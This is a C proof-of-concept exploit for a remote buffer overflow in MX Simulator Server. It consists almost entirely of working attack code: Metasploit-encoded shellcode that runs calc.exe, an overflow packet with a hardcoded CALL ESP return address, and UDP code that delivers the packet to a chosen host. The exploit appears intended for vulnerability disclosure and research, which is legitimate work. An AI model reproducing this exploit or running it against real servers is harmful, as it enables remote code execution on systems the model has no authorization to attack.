/* MX Simulator Server 2010-02-06 Remote Buffer Overflow PoC This PoC will executes the calc.exe software on the remote system. The bug was discovered by Luigi Auriemma (www.aluigi.org) Copyright 2010 Salvatore Fresta aka Drosophila This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation,Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA http://www.gnu.org/licenses/gpl-2.0.txt */ #include #include #include #include #ifdef WIN32 #include #include "winerr.h" #define close closesocket #else #include #include #include #include #include #include #endif #define BUFFSZ 1024 #define PORT 19800 /* * windows/exec - 511 bytes * http://www.metasploit.com * Encoder: x86/alpha_mixed * EXITFUNC=process, CMD=calc.exe */ #define shellcode \ "\xb8\x9e\xef\xf3\x90\x31\xc9\xb1\x33\xd9\xc2\xd9\x74\x24\xf4" \ "\x5b\x31\x43\x0e\x83\xc3\x04\x03\xdd\xe5\x11\x65\x1d\x11\x5c" \ "\x86\xdd\xe2\x3f\x0e\x38\xd3\x6d\x74\x49\x46\xa2\xfe\x1f\x6b" \ "\x49\x52\x8b\xf8\x3f\x7b\xbc\x49\xf5\x5d\xf3\x4a\x3b\x62\x5f" \ "\x88\x5d\x1e\x9d\xdd\xbd\x1f\x6e\x10\xbf\x58\x92\xdb\xed\x31" \ "\xd9\x4e\x02\x35\x9f\x52\x23\x99\x94\xeb\x5b\x9c\x6a\x9f\xd1" \ "\x9f\xba\x30\x6d\xd7\x22\x3a\x29\xc8\x53\xef\x29\x34\x1a\x84" \ "\x9a\xce\x9d\x4c\xd3\x2f\xac\xb0\xb8\x11\x01\x3d\xc0\x56\xa5" \ "\xde\xb7\xac\xd6\x63\xc0\x76\xa5\xbf\x45\x6b\x0d\x4b\xfd\x4f" \ "\xac\x98\x98\x04\xa2\x55\xee\x43\xa6\x68\x23\xf8\xd2\xe1\xc2" \ "\x2f\x53\xb1\xe0\xeb\x38\x61\x88\xaa\xe4\xc4\xb5\xad\x40\xb8" \ "\x13\xa5\x62\xad\x22\xe4\xe8\x30\xa6\x92\x55\x32\xb8\x9c\xf5" \ "\x5b\x89\x17\x9a\x1c\x16\xf2\xdf\xd3\x5c\x5f\x49\x7c\x39\x35" \ "\xc8\xe1\xba\xe3\x0e\x1c\x39\x06\xee\xdb\x21\x63\xeb\xa0\xe5" \ "\x9f\x81\xb9\x83\x9f\x36\xb9\x81\xc3\xd9\x29\x49\x2a\x7c\xca" \ "\xe8\x32" int send_recv(int sd, unsigned char *in, int insz, unsigned char *out, int outsz, struct sockaddr_in *peer, int err); int timeout(int sock, int secs); unsigned int resolv(char *host); void std_err(void); int main(int argc, char *argv[]) { struct sockaddr_in peer; int sd, len; unsigned short port = PORT; unsigned char buff[BUFFSZ], *host = NULL, pkg[] = "\x03" "\x00\x00\x00\x00" // slot "\x00\x00\x00\x00" // session id "\x00\x00\x00\x00" // admin pwd crc "\x00\x00\x00\x00" // uid "000000000000000000000000" // ??? "yz250f||||\n" // bike's model "999\n" // bike's number "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "\xd8\x69\x83\x7c" // EIP - CALL ESP (FFD4) shellcode; #ifdef WIN32 WSADATA wsadata; WSAStartup(MAKEWORD(1,0), &wsadata); #endif if(argc < 2) { printf("\nMX Simulator Server 2010-02-06 Remote Buffer Overflow PoC - Salvatore Fresta\n" "http://www.salvatorefresta.net\n" "\n" "Usage: %s (default: %hu)\n" "\n", argv[0], port); return -1; } host = argv[1]; if(argc > 2) port = atoi(argv[2]); peer.sin_addr.s_addr = resolv(host); peer.sin_port = htons(port); peer.sin_family = AF_INET; printf("\n[*] Socket opening in progress..."); sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if(sd < 0) { printf("\n[-] Unable to open a socket!\n\n"); std_err(); } printf("\n[+] Socket open successfully" "\n[*] Data sending in progress..."); memset(buff, 0, 9); len = send_recv(sd, buff, 9, buff, BUFFSZ, &peer, 1); *(int *)(pkg + 1) = *(int *)(buff + 1); *(int *)(pkg + 5) = *(int *)(buff + 5); len = send_recv(sd, pkg, sizeof(pkg) - 1, buff, BUFFSZ, &peer, 0); printf("\n[+] Data sent successfully" "\n[+] Connection closed\n\n"); close(sd); return 0; } int send_recv(int sd, unsigned char *in, int insz, unsigned char *out, int outsz, struct sockaddr_in *peer, int err) { int retry, len; if(in && !out) { fputc('.', stdout); if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in)) < 0) std_err(); return(0); } if(in) { for(retry = 2; retry; retry--) { fputc('.', stdout); if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in)) < 0) std_err(); if(!timeout(sd, 1)) break; } if(!retry) { if(!err) return(-1); printf("\nError: socket timeout, no reply received\n\n"); exit(1); } } else { if(timeout(sd, 3) < 0) return(-1); } fputc('.', stdout); len = recvfrom(sd, out, outsz, 0, NULL, NULL); if(len < 0 && err) std_err(); return len; } int timeout(int sock, int secs) { struct timeval tout; fd_set fd_read; int err; tout.tv_sec = secs; tout.tv_usec = 0; FD_ZERO(&fd_read); FD_SET(sock, &fd_read); err = select(sock + 1, &fd_read, NULL, NULL, &tout); if(err < 0) std_err(); if(!err) return(-1); return 0; } unsigned int resolv(char *host) { struct hostent *hp = NULL; unsigned int host_ip; host_ip = inet_addr(host); if(host_ip == INADDR_NONE) { hp = gethostbyname(host); if(!hp) { printf("\nError: Unable to resolv hostname (%s)\n", host); exit(1); } else host_ip = *(unsigned int *)hp->h_addr; } return host_ip; } #ifndef WIN32 void std_err(void) { perror("\nError"); exit(1); } #endif